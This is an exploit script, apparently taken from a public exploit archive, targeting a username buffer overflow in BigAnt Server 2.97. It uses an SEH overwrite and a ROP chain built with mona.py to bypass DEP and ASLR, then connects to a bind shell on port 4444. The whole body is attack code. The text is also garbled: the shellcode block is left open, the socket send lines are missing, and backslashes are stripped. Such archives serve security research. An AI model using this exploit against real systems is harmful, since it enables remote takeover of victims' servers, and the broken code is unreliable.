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# Title : BigAnt Server 2.97 - DDNF Username Buffer Overflow
# Published : 2013-04-10
# Author :
# Previous Title : DLink DIR-645 / DIR-815 diagnostic.php Command Execution
# Next Title : FreeFloat FTP 1.0 - DEP Bypass with ROP

#Title: BigAnt Server 2.97 DDNF Username Buffer Overflow
#Author: Craig Freyman (@cd1zz) http://pwnag3.com
#Tested on: Windows 7 64 bit (DEP/ASLR Bypass)
#Similar Exploits: 

import socket,os,struct,sys,subprocess,time

if len(sys.argv) < 2:
     print "[-]Usage: %s <target addr> " % sys.argv[0] + "r"

host = sys.argv[1]

#msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "x00x0ax0dx20x25x27" 
sc = (

#rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack('<L',0x0f9edaa9)	# POP EDX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0fa021cc)	# ptr to &VirtualProtect() [IAT expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9ea2a7)	# MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e0214)	# PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9ee3d9)	# POP ECX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0F9A5001)	# &Writable location 
rop_gadgets += struct.pack('<L',0x0f9f1e7c) # POP EDX # RETN  [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xffffffff) # EDX starting value
for i in range(0,65): rop_gadgets += struct.pack('<L',0x0f9dbb5a)  # INC EDX # RETN ghetto style [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e65b6) # POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0xfffffdff)	# Value to negate, will become 0x00000201
rop_gadgets += struct.pack('<L',0x0f9f2831) # NEG EAX # RETN [expsrv.dll]  
rop_gadgets += struct.pack('<L',0x0f9c5f4b) # POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi
rop_gadgets += struct.pack('<L',0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08    ** [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9e24f9) # push esp # ret 0x08 |  {PAGE_EXECUTE_READ} [expsrv.dll
rop_gadgets += struct.pack('<L',0x0f9c5f4b)	# POP EDI # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x41414141)	# Filler (compensate)
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]
rop_gadgets += struct.pack('<L',0x0f9c8a3e)	# POP EAX # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x909006eb)	# nop with a ninja jump
rop_gadgets += struct.pack('<L',0x0f9f30c2)	# PUSHAD # RETN [expsrv.dll] 
rop_gadgets += struct.pack('<L',0x0f9e5cd2)	# RETN (ROP NOP) [expsrv.dll]

front = "A" * 684
seh = struct.pack('<L',0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "x81xc4x24xfaxffxff"
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) 

sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
print "[+] Sending pwnag3 to " + str(host)

try :
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	"DDNF 17n"
	"classid: 100n"
	"cmdid: 1n"
	"objid: 1n"
	"rootid: 3n"
	"userid: 8n"
	"username: "+sploit+
	print "[-] There was a problem"

print "[+] Getting your shell. "
subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
print"[*] Done." 